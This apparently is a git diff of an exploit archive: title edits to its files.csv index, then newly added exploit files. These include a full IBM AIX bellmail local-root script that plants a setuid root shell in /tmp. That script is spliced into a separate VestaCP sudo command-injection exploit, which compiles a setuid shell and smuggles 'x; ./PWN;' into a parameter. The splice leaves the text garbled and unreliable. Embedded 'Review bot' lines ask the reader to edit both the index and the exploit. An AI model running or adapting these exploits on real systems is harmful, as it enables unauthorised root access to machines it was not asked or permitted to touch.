 22889,platforms/asp/webapps/22889.pl,"Virtual Programming VP-ASP 5.00 - shopexd.asp SQL Injection (2)",2003-07-10,"Bosen & TioEuy",asp,webapps,0
 22895,platforms/asp/webapps/22895.txt,"ASP-DEV Discussion Forum 2.0 - Admin Directory Weak Default Permissions",2003-07-13,G00db0y,asp,webapps,0
@@ -26781,7 +26791,7 @@ id,file,description,date,author,platform,type,port
 24134,platforms/php/webapps/24134.txt,"CMS snews - SQL Injection",2013-01-15,"By onestree",php,webapps,0
 24138,platforms/php/webapps/24138.txt,"e107 Website System 0.5/0.6 - Log.php HTML Injection",2004-05-21,Chinchilla,php,webapps,0
 24139,platforms/jsp/webapps/24139.txt,"Liferay Enterprise Portal 1.x/2.x/5.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2004-05-22,"Sandeep Giri",jsp,webapps,0
-24151,platforms/php/webapps/24151.txt,"JPortal 2.2.1 - print.php SQL Injection",2004-05-28,"Maciek Wierciski",php,webapps,0
+24151,platforms/php/webapps/24151.txt,"jPORTAL 2.2.1 - 'print.php' SQL Injection",2004-05-28,"Maciek Wierciski",php,webapps,0
 24152,platforms/php/webapps/24152.txt,"Land Down Under - BBCode HTML Injection",2004-05-29,"Tim De Gier",php,webapps,0
 24153,platforms/php/webapps/24153.txt,"e107 website system 0.6 - usersettings.php avmsg Parameter Cross-Site Scripting",2004-05-29,"Janek Vind",php,webapps,0
 24154,platforms/php/webapps/24154.txt,"e107 website system 0.6 - 'email article to a friend' Feature Cross-Site Scripting",2004-05-29,"Janek Vind",php,webapps,0
@@ -27341,7 +27351,7 @@ id,file,description,date,author,platform,type,port
 25242,platforms/php/webapps/25242.txt,"Ciamos 0.9.2 - Highlight.php File Disclosure",2005-03-19,"Majid NT",php,webapps,0
 40397,platforms/aspx/webapps/40397.txt,"MuM MapEdit 3.2.6.0 - Multiple Vulnerabilities",2016-09-19,"Paul Baade and Sven Krewitt",aspx,webapps,0
 25243,platforms/php/webapps/25243.txt,"TRG News 3.0 Script - Remote File Inclusion",2005-03-21,Frank_Reiner,php,webapps,0
-25244,platforms/php/webapps/25244.txt,"CzarNews 1.13/1.14 - headlines.php Remote File Inclusion",2005-03-21,brOmstar,php,webapps,0
+25244,platforms/php/webapps/25244.txt,"CzarNews 1.13/1.14 - 'headlines.php' Remote File Inclusion",2005-03-21,brOmstar,php,webapps,0
 25245,platforms/php/webapps/25245.txt,"Social Site Generator 2.2 - Cross-Site Request Forgery (Add Admin)",2013-05-06,Fallaga,php,webapps,0
 25247,platforms/php/webapps/25247.txt,"Craigslist Gold - SQL Injection",2013-05-06,Fallaga,php,webapps,0
 25248,platforms/php/webapps/25248.txt,"Joomla! Component 'dj-classifieds' 2.0 - Blind SQL Injection",2013-05-06,Napsterakos,php,webapps,0
@@ -27443,7 +27453,7 @@ id,file,description,date,author,platform,type,port
 25379,platforms/php/webapps/25379.txt,"Zoom Media Gallery 2.1.2 - 'index.php' SQL Injection",2005-04-11,"Andreas Constantinides",php,webapps,0
 25380,platforms/php/webapps/25380.txt,"Invision Power Board 1.x - ST Parameter SQL Injection",2005-04-11,Dcrab,php,webapps,0
 25381,platforms/php/webapps/25381.txt,"WebCT Discussion Board 4.1 - HTML Injection",2005-04-11,lacertosum,php,webapps,0
-25382,platforms/php/webapps/25382.txt,"JPortal 2.3.1 - Banner.php SQL Injection",2005-04-11,CiNU5,php,webapps,0
+25382,platforms/php/webapps/25382.txt,"jPORTAL 2.3.1 - 'Banner.php' SQL Injection",2005-04-11,CiNU5,php,webapps,0
 25390,platforms/asp/webapps/25390.txt,"Comersus Cart 4.0/5.0 - Comersus_Search_Item.asp Cross-Site Scripting",2005-04-12,Lostmon,asp,webapps,0
 25394,platforms/php/webapps/25394.txt,"Pinnacle Cart - 'index.php' Cross-Site Scripting",2005-04-12,SmOk3,php,webapps,0
 25398,platforms/php/webapps/25398.txt,"PHPBB2 Plus 1.5 - GroupCP.php Cross-Site Scripting",2005-04-13,Dcrab,php,webapps,0
@@ -27616,7 +27626,7 @@ id,file,description,date,author,platform,type,port
 25619,platforms/php/webapps/25619.txt,"MidiCart PHP - Item_List.php SecondGroup Parameter Cross-Site Scripting",2005-05-05,Exoduks,php,webapps,0
 25620,platforms/php/webapps/25620.txt,"MidiCart PHP - Item_List.php MainGroup Parameter Cross-Site Scripting",2005-05-05,Exoduks,php,webapps,0
 25622,platforms/cgi/webapps/25622.txt,"MegaBook 2.0/2.1 - Admin.cgi EntryID Cross-Site Scripting",2005-05-05,"Spy Hat",cgi,webapps,0
-25623,platforms/php/webapps/25623.txt,"CJ Ultra Plus 1.0.3/1.0.4 - OUT.php SQL Injection",2005-05-06,Kold,php,webapps,0
+25623,platforms/php/webapps/25623.txt,"CJ Ultra Plus 1.0.3/1.0.4 - 'OUT.php' SQL Injection",2005-05-06,Kold,php,webapps,0
 25628,platforms/jsp/webapps/25628.txt,"phpBB 2.0.x - URL Tag BBCode.php",2005-05-09,Papados,jsp,webapps,0
 25630,platforms/php/webapps/25630.txt,"Advanced Guestbook 2.3.1/2.4 - 'index.php' Entry Parameter SQL Injection",2005-05-09,"Spy Hat",php,webapps,0
 25632,platforms/cgi/webapps/25632.txt,"Easy Message Board - Directory Traversal",2005-05-09,"SoulBlack Group",cgi,webapps,0
@@ -27904,7 +27914,7 @@ id,file,description,date,author,platform,type,port
 25998,platforms/hardware/webapps/25998.txt,"Asus RT56U 3.0.0.4.360 - Remote Command Injection",2013-06-07,drone,hardware,webapps,0
 26001,platforms/java/webapps/26001.txt,"Novell Groupwise 6.5 Webaccess - HTML Injection",2005-07-15,"Francisco Amato",java,webapps,0
 26007,platforms/php/webapps/26007.txt,"PHP Ticket System Beta 1 - Cross-Site Request Forgery",2013-06-07,"Pablo Ribeiro",php,webapps,0
-26293,platforms/php/webapps/26293.txt,"JPortal 2.2.1/2.3.1 - download.php SQL Injection",2005-08-21,krasza,php,webapps,0
+26293,platforms/php/webapps/26293.txt,"jPORTAL 2.2.1/2.3.1 - 'download.php' SQL Injection",2005-08-21,krasza,php,webapps,0
 26294,platforms/php/webapps/26294.txt,"PHPMyFAQ 1.5.1 - Password.php SQL Injection",2005-08-23,retrogod@aliceposta.it,php,webapps,0
 26295,platforms/php/webapps/26295.txt,"PHPMyFAQ 1.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-23,rgod,php,webapps,0
 26296,platforms/php/webapps/26296.txt,"PHPMyFAQ 1.5.1 - Local File Inclusion",2005-08-23,rgod,php,webapps,0
@@ -28251,8 +28261,8 @@ id,file,description,date,author,platform,type,port
 26466,platforms/php/webapps/26466.txt,"CuteNews 1.4.1 - 'template' Parameter Traversal Arbitrary File Access",2005-11-02,retrogod@aliceposta.it,php,webapps,0
 26467,platforms/php/webapps/26467.txt,"PHP Handicapper - Process_signup.php HTTP Response Splitting",2005-11-03,BiPi_HaCk,php,webapps,0
 26468,platforms/php/webapps/26468.pl,"Galerie 2.4 - showgallery.php SQL Injection",2005-11-03,abducter_minds@yahoo.com,php,webapps,0
-26469,platforms/php/webapps/26469.txt,"JPortal Web Portal 2.2.1/2.3.1 - comment.php id Parameter SQL Injection",2005-11-04,Mousehack,php,webapps,0
-26470,platforms/php/webapps/26470.txt,"JPortal Web Portal 2.2.1/2.3.1 - news.php id Parameter SQL Injection",2005-11-04,Mousehack,php,webapps,0
+26469,platforms/php/webapps/26469.txt,"JPortal Web Portal 2.2.1/2.3.1 - 'comment.php' SQL Injection",2005-11-04,Mousehack,php,webapps,0
+26470,platforms/php/webapps/26470.txt,"JPortal Web Portal 2.2.1/2.3.1 - 'news.php' SQL Injection",2005-11-04,Mousehack,php,webapps,0
 26473,platforms/asp/webapps/26473.txt,"Ocean12 ASP Calendar Manager 1.0 - Authentication Bypass",2005-11-04,syst3m_f4ult,asp,webapps,0
 26474,platforms/php/webapps/26474.txt,"PHPFM - Arbitrary File Upload",2005-11-07,rUnViRuS,php,webapps,0
 26475,platforms/cgi/webapps/26475.txt,"Asterisk 0.x/1.0/1.2 Voicemail - Unauthorized Access",2005-11-07,"Adam Pointon",cgi,webapps,0
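Review bot: Rows 26469 and 26470 keep the spelling `JPortal Web Portal` while this same commit renames `JPortal` to `jPORTAL` in the hunks at `@@ -26781`, `@@ -27443`, `@@ -27904` and `@@ -28577`, so a search on either spelling now returns only part of the jPORTAL entries. Make the two titles `jPORTAL 2.2.1/2.3.1 - 'comment.php' SQL Injection` and `jPORTAL 2.2.1/2.3.1 - 'news.php' SQL Injection`; the rest of each row is unchanged.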
@@ -28284,7 +28294,7 @@ id,file,description,date,author,platform,type,port
 26510,platforms/php/webapps/26510.txt,"Pearl Forums 2.0 - 'index.php' Multiple SQL Injection",2005-11-15,abducter_minds@yahoo.com,php,webapps,0
 26511,platforms/php/webapps/26511.txt,"Pearl Forums 2.0 - 'index.php' Local File Inclusion",2005-11-15,abducter_minds@yahoo.com,php,webapps,0
 26512,platforms/php/webapps/26512.txt,"PHPWCMS 1.2.5 -DEV - 'login.php' form_lang Parameter Traversal Arbitrary File Access",2005-11-15,"Stefan Lochbihler",php,webapps,0
-26513,platforms/php/webapps/26513.txt,"PHPWCMS 1.2.5 -DEV - random_image.php imgdir Parameter Traversal Arbitrary File Access",2005-11-15,"Stefan Lochbihler",php,webapps,0
+26513,platforms/php/webapps/26513.txt,"PHPWCMS 1.2.5 -DEV - 'imgdir' Parameter Traversal Arbitrary File Access",2005-11-15,"Stefan Lochbihler",php,webapps,0
 26514,platforms/php/webapps/26514.txt,"PHPWCMS 1.2.5 -DEV - Multiple Cross-Site Scripting Vulnerabilities",2005-11-15,"Stefan Lochbihler",php,webapps,0
 26515,platforms/php/webapps/26515.txt,"Alstrasoft Template Seller Pro 3.25 - Remote File Inclusion",2005-11-15,"Robin Verton",php,webapps,0
 26516,platforms/php/webapps/26516.txt,"Ekinboard 1.0.3 - profile.php Cross-Site Scripting",2005-11-15,trueend5,php,webapps,0
@@ -28577,7 +28587,7 @@ id,file,description,date,author,platform,type,port
 26865,platforms/cgi/webapps/26865.txt,"WebCal 3.0 4 - webcal.cgi Multiple Parameter Cross-Site Scripting",2005-12-16,"Stan Bubrouski",cgi,webapps,0
 26866,platforms/php/webapps/26866.txt,"Round Cube Webmail 0.1 -20051021 - Full Path Disclosure",2005-12-17,king_purba,php,webapps,0
 26867,platforms/php/webapps/26867.txt,"PHP Fusebox 3.0 - 'index.php' Cross-Site Scripting",2005-12-19,"bogel and lukman",php,webapps,0
-26868,platforms/php/webapps/26868.txt,"JPortal 2.2.1/2.3 Forum - forum.php SQL Injection",2005-12-19,Zbigniew,php,webapps,0
+26868,platforms/php/webapps/26868.txt,"jPORTAL 2.2.1/2.3 Forum - 'forum.php' SQL Injection",2005-12-19,Zbigniew,php,webapps,0
 26870,platforms/php/webapps/26870.txt,"Advanced Guestbook 2.x - Multiple Cross-Site Scripting Vulnerabilities",2005-12-19,Handrix,php,webapps,0
 26871,platforms/php/webapps/26871.txt,"PlaySms - 'index.php' Cross-Site Scripting",2005-12-19,mohajali2k4,php,webapps,0
 26872,platforms/php/webapps/26872.txt,"PHP-Fusion 6.0 - 'members.php' Cross-Site Scripting",2005-12-19,krasza,php,webapps,0
@@ -29523,7 +29533,7 @@ id,file,description,date,author,platform,type,port
 28139,platforms/php/webapps/28139.txt,"SoftBiz Banner Exchange Script 1.0 - gen_confirm_mem.php PHPSESSID Parameter Cross-Site Scripting",2006-06-29,securityconnection,php,webapps,0
 28140,platforms/php/webapps/28140.txt,"SoftBiz Banner Exchange Script 1.0 - 'index.php' PHPSESSID Parameter Cross-Site Scripting",2006-06-29,securityconnection,php,webapps,0
 28141,platforms/php/webapps/28141.txt,"SiteBuilder-FX - top.php Remote File Inclusion",2006-06-01,MazaGi,php,webapps,0
-28142,platforms/php/webapps/28142.txt,"Diesel Joke Site - Category.php SQL Injection",2006-07-01,black-code,php,webapps,0
+28142,platforms/php/webapps/28142.txt,"Diesel Joke Site - 'Category.php' SQL Injection",2006-07-01,black-code,php,webapps,0
 28143,platforms/php/webapps/28143.pl,"SturGeoN Upload - Arbitrary File Upload",2006-07-01,"Jihad BENABRA",php,webapps,0
 28146,platforms/php/webapps/28146.txt,"Vincent Leclercq News 5.2 - Cross-Site Scripting",2006-07-03,DarkFig,php,webapps,0
 28147,platforms/php/webapps/28147.txt,"Plume CMS 1.0.4 - 'index.php' _PX_config[manager_path] Parameter Remote File Inclusion",2007-07-03,CrAsh_oVeR_rIdE,php,webapps,0
@@ -29633,8 +29643,8 @@ id,file,description,date,author,platform,type,port
 28319,platforms/php/webapps/28319.txt,"Knusperleicht FAQ 1.0 Script - 'index.php' Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0
 28320,platforms/php/webapps/28320.txt,"Knusperleicht Guestbook 3.5 - GB_PATH Parameter Remote File Inclusion",2006-08-01,"Kurdish Security",php,webapps,0
 28321,platforms/cgi/webapps/28321.pl,"Barracuda Spam Firewall 3.3.x - preview_email.cgi file Parameter Arbitrary File Access",2006-08-01,"Greg Sinclair",cgi,webapps,0
-28322,platforms/php/webapps/28322.txt,"TinyPHPForum 3.6 - error.php Information Disclosure",2006-08-01,SirDarckCat,php,webapps,0
-28323,platforms/php/webapps/28323.txt,"TinyPHPForum 3.6 - UpdatePF.php Authentication Bypass",2006-08-01,SirDarckCat,php,webapps,0
+28322,platforms/php/webapps/28322.txt,"TinyPHPForum 3.6 - 'error.php' Information Disclosure",2006-08-01,SirDarckCat,php,webapps,0
+28323,platforms/php/webapps/28323.txt,"TinyPHPForum 3.6 - 'UpdatePF.php' Authentication Bypass",2006-08-01,SirDarckCat,php,webapps,0
 28324,platforms/php/webapps/28324.txt,"BlackBoard Products 6 - Multiple HTML Injection Vulnerabilities",2006-08-24,proton,php,webapps,0
 28326,platforms/php/webapps/28326.txt,"VWar 1.x - war.php page Parameter Cross-Site Scripting",2006-08-03,mfoxhacker,php,webapps,0
 28327,platforms/php/webapps/28327.txt,"VWar 1.x - war.php Multiple Parameter SQL Injection",2006-08-03,mfoxhacker,php,webapps,0
@@ -29742,9 +29752,9 @@ id,file,description,date,author,platform,type,port
 28494,platforms/php/webapps/28494.txt,"AckerTodo 4.0 - 'index.php' Cross-Site Scripting",2006-09-07,viz.security,php,webapps,0
 28495,platforms/php/webapps/28495.txt,"TWiki 4.0.x - Viewfile Directory Traversal",2006-09-07,"Peter Thoeny",php,webapps,0
 28496,platforms/php/webapps/28496.php,"PHP-Fusion 6.0.x - 'news.php' SQL Injection",2006-09-07,rgod,php,webapps,0
-28497,platforms/php/webapps/28497.txt,"Vikingboard Viking board 0.1b - help.php act Parameter Cross-Site Scripting",2006-09-08,Hessam-x,php,webapps,0
-28498,platforms/php/webapps/28498.txt,"Vikingboard Viking board 0.1b - report.php p Parameter Cross-Site Scripting",2006-09-08,Hessam-x,php,webapps,0
-28499,platforms/php/webapps/28499.txt,"Vikingboard 0.1 - topic.php SQL Injection",2006-09-08,Hessam-x,php,webapps,0
+28497,platforms/php/webapps/28497.txt,"Vikingboard 0.1b - 'help.php' Cross-Site Scripting",2006-09-08,Hessam-x,php,webapps,0
+28498,platforms/php/webapps/28498.txt,"Vikingboard 0.1b - 'report.php' Cross-Site Scripting",2006-09-08,Hessam-x,php,webapps,0
+28499,platforms/php/webapps/28499.txt,"Vikingboard 0.1 - 'topic.php' SQL Injection",2006-09-08,Hessam-x,php,webapps,0
 28502,platforms/php/webapps/28502.txt,"TextAds - delete.php id Parameter Cross-Site Scripting",2006-09-09,s3rv3r_hack3r,php,webapps,0
 28503,platforms/php/webapps/28503.txt,"TextAds - error.php error Parameter Cross-Site Scripting",2006-09-09,s3rv3r_hack3r,php,webapps,0
 28505,platforms/php/webapps/28505.txt,"PHProg 1.0 - Multiple Input Validation Vulnerabilities",2006-09-11,cdg393,php,webapps,0
@@ -30403,14 +30413,14 @@ id,file,description,date,author,platform,type,port
 29359,platforms/asp/webapps/29359.txt,"DMXReady Secure Login Manager 1.0 - content.asp sent Parameter SQL Injection",2006-12-27,Doz,asp,webapps,0
 29360,platforms/asp/webapps/29360.txt,"DMXReady Secure Login Manager 1.0 - members.asp sent Parameter SQL Injection",2006-12-27,Doz,asp,webapps,0
 29361,platforms/asp/webapps/29361.txt,"DMXReady Secure Login Manager 1.0 - applications/SecureLoginManager/inc_secureloginmanager.asp sent Parameter SQL Injection",2006-12-27,Doz,asp,webapps,0
-29363,platforms/php/webapps/29363.txt,"PHP iCalendar 1.1/2.x - day.php Multiple Parameter Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0
-29364,platforms/php/webapps/29364.txt,"PHP iCalendar 1.1/2.x - month.php Multiple Parameter Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0
-29365,platforms/php/webapps/29365.txt,"PHP iCalendar 1.1/2.x - year.php Multiple Parameter Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0
-29366,platforms/php/webapps/29366.txt,"PHP iCalendar 1.1/2.x - week.php Multiple Parameter Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0
-29367,platforms/php/webapps/29367.txt,"PHP iCalendar 1.1/2.x - search.php Multiple Parameter Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0
-29368,platforms/php/webapps/29368.txt,"PHP iCalendar 1.1/2.x - rss/index.php getdate Parameter Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0
-29369,platforms/php/webapps/29369.txt,"PHP iCalendar 1.1/2.x - print.php getdate Parameter Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0
-29370,platforms/php/webapps/29370.txt,"PHP iCalendar 1.1/2.x - preferences.php Multiple Parameter Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0
+29363,platforms/php/webapps/29363.txt,"PHP iCalendar 1.1/2.x - 'day.php' Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0
+29364,platforms/php/webapps/29364.txt,"PHP iCalendar 1.1/2.x - 'month.php' Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0
+29365,platforms/php/webapps/29365.txt,"PHP iCalendar 1.1/2.x - 'year.php' Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0
+29366,platforms/php/webapps/29366.txt,"PHP iCalendar 1.1/2.x - 'week.php' Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0
+29367,platforms/php/webapps/29367.txt,"PHP iCalendar 1.1/2.x - 'search.php' Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0
+29368,platforms/php/webapps/29368.txt,"PHP iCalendar 1.1/2.x - 'getdate' Parameter Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0
+29369,platforms/php/webapps/29369.txt,"PHP iCalendar 1.1/2.x - 'print.php' Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0
+29370,platforms/php/webapps/29370.txt,"PHP iCalendar 1.1/2.x - 'preferences.php' Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0
 29372,platforms/php/webapps/29372.txt,"Mobilelib Gold - Multiple Cross-Site Scripting Vulnerabilities",2006-12-29,"viP HaCKEr",php,webapps,0
 29373,platforms/asp/webapps/29373.txt,"Spooky 2.7 - login/register.asp SQL Injection",2006-12-30,Doz,asp,webapps,0
 29377,platforms/php/webapps/29377.txt,"AShop Deluxe 4.5 - 'catalogue.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
@@ -30984,12 +30994,12 @@ id,file,description,date,author,platform,type,port
 30301,platforms/php/webapps/30301.txt,"Dating Gold 3.0.5 - header.php int_path Parameter Remote File Inclusion",2007-07-13,mostafa_ragab,php,webapps,0
 30302,platforms/php/webapps/30302.txt,"Dating Gold 3.0.5 - footer.php int_path Parameter Remote File Inclusion",2007-07-13,mostafa_ragab,php,webapps,0
 30303,platforms/php/webapps/30303.txt,"Dating Gold 3.0.5 - secure.admin.php int_path Parameter Remote File Inclusion",2007-07-13,mostafa_ragab,php,webapps,0
-30383,platforms/php/webapps/30383.txt,"Vikingboard Viking board 0.1.2 - cp.php Multiple Parameter Cross-Site Scripting",2007-07-25,Lostmon,php,webapps,0
-30384,platforms/php/webapps/30384.txt,"Vikingboard Viking board 0.1.2 - user.php u Parameter Cross-Site Scripting",2007-07-25,Lostmon,php,webapps,0
-30385,platforms/php/webapps/30385.txt,"Vikingboard Viking board 0.1.2 - post.php Multiple Parameter Cross-Site Scripting",2007-07-25,Lostmon,php,webapps,0
-30386,platforms/php/webapps/30386.txt,"Vikingboard Viking board 0.1.2 - topic.php s Parameter Cross-Site Scripting",2007-07-25,Lostmon,php,webapps,0
-30387,platforms/php/webapps/30387.txt,"Vikingboard Viking board 0.1.2 - forum.php debug Variable Information Disclosure",2007-07-25,Lostmon,php,webapps,0
-30388,platforms/php/webapps/30388.txt,"Vikingboard Viking board 0.1.2 - cp.php debug Variable Information Disclosure",2007-07-25,Lostmon,php,webapps,0
+30383,platforms/php/webapps/30383.txt,"Vikingboard 0.1.2 - 'cp.php' Cross-Site Scripting",2007-07-25,Lostmon,php,webapps,0
+30384,platforms/php/webapps/30384.txt,"Vikingboard 0.1.2 - 'user.php' Cross-Site Scripting",2007-07-25,Lostmon,php,webapps,0
+30385,platforms/php/webapps/30385.txt,"Vikingboard 0.1.2 - 'post.php' Cross-Site Scripting",2007-07-25,Lostmon,php,webapps,0
+30386,platforms/php/webapps/30386.txt,"Vikingboard 0.1.2 - 'topic.php' Cross-Site Scripting",2007-07-25,Lostmon,php,webapps,0
+30387,platforms/php/webapps/30387.txt,"Vikingboard 0.1.2 - 'forum.php' Information Disclosure",2007-07-25,Lostmon,php,webapps,0
+30388,platforms/php/webapps/30388.txt,"Vikingboard 0.1.2 - 'cp.php' Information Disclosure",2007-07-25,Lostmon,php,webapps,0
 30389,platforms/php/webapps/30389.txt,"iFoto 1.0 - 'index.php' Directory Traversal",2007-07-25,Lostmon,php,webapps,0
 30390,platforms/php/webapps/30390.txt,"BSM Store Dependent Forums 1.02 - 'Username' Parameter SQL Injection",2007-07-26,"Aria-Security Team",php,webapps,0
 30391,platforms/php/webapps/30391.txt,"PHPHostBot 1.05 - Authorize.php Remote File Inclusion",2007-07-26,S4M3K,php,webapps,0
@@ -33555,8 +33565,8 @@ id,file,description,date,author,platform,type,port
 34616,platforms/php/webapps/34616.txt,"Elkagroup Elkapax - 'q' Parameter Cross-Site Scripting",2009-08-13,Isfahan,php,webapps,0
 34617,platforms/php/webapps/34617.txt,"Waverider Systems Perlshop - Multiple Input Validation Vulnerabilities",2009-08-06,Shadow,php,webapps,0
 34618,platforms/php/webapps/34618.txt,"Omnistar Recruiting - 'resume_register.php' Cross-Site Scripting",2009-09-06,MizoZ,php,webapps,0
-34619,platforms/php/webapps/34619.txt,"PaysiteReviewCMS 1.1 - search.php q Parameter Cross-Site Scripting",2010-09-14,"Valentin Hoebel",php,webapps,0
-34620,platforms/php/webapps/34620.txt,"PaysiteReviewCMS - image.php image Parameter Cross-Site Scripting",2010-09-14,"Valentin Hoebel",php,webapps,0
+34619,platforms/php/webapps/34619.txt,"PaysiteReviewCMS 1.1 - 'search.php' Cross-Site Scripting",2010-09-14,"Valentin Hoebel",php,webapps,0
+34620,platforms/php/webapps/34620.txt,"PaysiteReviewCMS - 'image.php' Cross-Site Scripting",2010-09-14,"Valentin Hoebel",php,webapps,0
 34751,platforms/hardware/webapps/34751.pl,"ZYXEL Prestig P-660HNU-T1 - ISP Credentials Disclosure",2014-09-24,"Sebastián Magof",hardware,webapps,80
 34624,platforms/php/webapps/34624.txt,"OroCRM - Persistent Cross-Site Scripting",2014-09-11,Provensec,php,webapps,80
 34625,platforms/php/webapps/34625.py,"Joomla! Component 'com_spidercontacts' 1.3.6 - 'contacts_id' Parameter SQL Injection",2014-09-11,"Claudio Viviani",php,webapps,80
@@ -34556,7 +34566,7 @@ id,file,description,date,author,platform,type,port
 36244,platforms/php/webapps/36244.txt,"Boonex Dolphin 6.1 - 'get_list.php' SQL Injection",2011-10-19,"Yuri Goltsev",php,webapps,0
 36245,platforms/php/webapps/36245.txt,"Innovate Portal 2.0 - 'cat' Parameter Cross-Site Scripting",2011-10-20,"Eyup CELIK",php,webapps,0
 36213,platforms/php/webapps/36213.txt,"Active CMS 1.2 - 'mod' Parameter Cross-Site Scripting",2011-10-06,"Stefan Schurtz",php,webapps,0
-36214,platforms/php/webapps/36214.txt,"BuzzScripts BuzzyWall 1.3.2 - 'resolute.php' Information Disclosure",2011-10-07,cr4wl3r,php,webapps,0
+36214,platforms/php/webapps/36214.txt,"BuzzyWall 1.3.2 - 'resolute.php' Information Disclosure",2011-10-07,cr4wl3r,php,webapps,0
 36215,platforms/php/webapps/36215.txt,"Joomla! Component 'com_expedition' - 'id' Parameter SQL Injection",2011-10-09,"BHG Security Center",php,webapps,0
 36216,platforms/php/webapps/36216.txt,"Jaws 0.8.14 - Multiple Remote File Inclusion",2011-10-10,indoushka,php,webapps,0
 36220,platforms/php/webapps/36220.txt,"Joomla! Component 'com_tree' - 'key' Parameter SQL Injection",2011-10-11,CoBRa_21,php,webapps,0
diff --git a/platforms/aix/local/40950.sh b/platforms/aix/local/40950.sh
new file mode 100755
index 000000000..d35433bdb
--- /dev/null
+++ b/platforms/aix/local/40950.sh
@@ -0,0 +1,94 @@ +#!/usr/bin/sh +# +# CVE-2016-8972/bellmailroot.sh: IBM AIX Bellmail local root +# +# Affected versions: +# AIX 6.1, 7.1, 7.2 +# VIOS 2.2.x +# +# Fileset Lower Level Upper Level KEY +# --------------------------------------------------------- +# bos.net.tcp.client 6.1.9.0 6.1.9.200 key_w_fs +# bos.net.tcp.client 7.1.3.0 7.1.3.47 key_w_fs +# bos.net.tcp.client 7.1.4.0 7.1.4.30 key_w_fs +# bos.net.tcp.client_core 7.2.0.0 7.2.0.1 key_w_fs +# bos.net.tcp.client_core 7.2.1.0 7.2.1.0 key_w_fs +# +# Ref: http://aix.software.ibm.com/aix/efixes/security/bellmail_advisory.asc +# Ref: https://rhinosecuritylabs.com/2016/12/21/unix-nostalgia-aix-bug-hunting-part-2-bellmail-privilege-escalation-cve-2016-8972/ +# @hxmonsegur //RSL - https://www.rhinosecuritylabs.com + +ROOTSHELL=/tmp/shell-$(od -N4 -tu /dev/random | awk 'NR==1 {print $2} {}') +VULNBIN=/usr/bin/bellmail +SUIDPROFILE=/etc/suid_profile + +function ESCALATE +{ + echo "[*] Preparing escalation" + + $VULNBIN >/dev/null 2>&1 < /etc/suid_profile + + echo "[*] Injecting payload" + cat << EOF >$SUIDPROFILE +cp /bin/ksh $ROOTSHELL +/usr/bin/syscall setreuid 0 0 +chown root:system $ROOTSHELL +chmod 6755 $ROOTSHELL +rm -f $SUIDPROFILE +EOF + + echo "[*] Executing SUID to leverage privileges" + /usr/bin/ibstat -a >/dev/null 2>&1 + + if [ ! -x $ROOTSHELL ]; then + echo "[-] Root shell does not exist or is not executable. Exploit failed." + exit 1 + fi + + echo "[*] Escalating to root.." + $ROOTSHELL + echo "[*] Make sure to remove $ROOTSHELL" +} + +echo "[*] IBM AIX 6.1, 7.1, 7.2 Bellmail Local root @hxmonsegur//RSL" + +$VULNBIN -e +if [ $? -eq 0 ] + then + ESCALATE + echo "[*] Make sure to remove $ROOTSHELL" + exit 0 +fi + +echo "[*] Sending mail to non-existent user, force a bounce within ~minute" +/usr/bin/mail nonexistentuser < suid.c << _EOF +int main(void) { + setgid(0); setuid(0); + execl("/bin/sh","sh",0); } +_EOF + +# Compile suid shell with gcc. +# [!] 
If there is no gcc on the system deploy a precompiled binary manually. +gcc suid.c -o suid + +# Create a shell script called PWN that will be run as root. +# PWN will weaponize ./suid with executable permissions and suid bit. +echo "chown root:root suid; chmod 777 suid; chmod +s suid;" > PWN + +# Make PWN shell script executable. +chmod +x PWN + +# Inject command to run PWN into v-get-web-domain-value parameter $3. +sudo /usr/local/vesta/bin/v-get-web-domain-value 'admin' 'domain.com' 'x; ./PWN;' + +# Spawn the root shell. +./suid \ No newline at end of file diff --git a/platforms/macos/dos/40952.c b/platforms/macos/dos/40952.c new file mode 100755 index 000000000..081f31c0d --- /dev/null +++ b/platforms/macos/dos/40952.c 
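Review bot: ESCALATE leaves a world-executable setuid/setgid root copy of ksh at `$ROOTSHELL` in /tmp after the interactive shell exits, and the script only prints a reminder about it, so any other local user can pick it up until someone remembers to delete it. Make the cleanup part of the flow by replacing the `$ROOTSHELL` line and the echo that follows it with `"$ROOTSHELL"; rm -f "$ROOTSHELL"`, and drop the duplicate "Make sure to remove" echo after the ESCALATE call in the main path. The `$VULNBIN >/dev/null 2>&1 < /etc/suid_profile` line reads as though redirection text was lost in this rendering; the intended bellmail command sequence should be spelled out in a comment so the trigger is reproducible. The hunk as shown runs from the `/usr/bin/mail nonexistentuser <` line into text that looks like an unrelated gcc/VestaCP exploit, so the tail of the script could not be reviewed here.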
@@ -0,0 +1,190 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=974 + +There are two ways for IOServices to define their IOUserClient classes: they can +override IOService::newUserClient and allocate the correct type themselves +or they can set the IOUserClientClass key in their registry entry. + +The default implementation of IOService::newUserClient does this: + + IOReturn IOService::newUserClient( task_t owningTask, void * securityID, + UInt32 type, OSDictionary * properties, + IOUserClient ** handler ) + { + const OSSymbol *userClientClass = 0; + IOUserClient *client; + OSObject *temp; + + if (kIOReturnSuccess == newUserClient( owningTask, securityID, type, handler )) + return kIOReturnSuccess; + + // First try my own properties for a user client class name + temp = getProperty(gIOUserClientClassKey); + if (temp) { + if (OSDynamicCast(OSSymbol, temp)) + userClientClass = (const OSSymbol *) temp; + else if (OSDynamicCast(OSString, temp)) { + userClientClass = OSSymbol::withString((OSString *) temp); + if (userClientClass) + setProperty(kIOUserClientClassKey, + (OSObject *) userClientClass); + } + } + + // Didn't find one so lets just 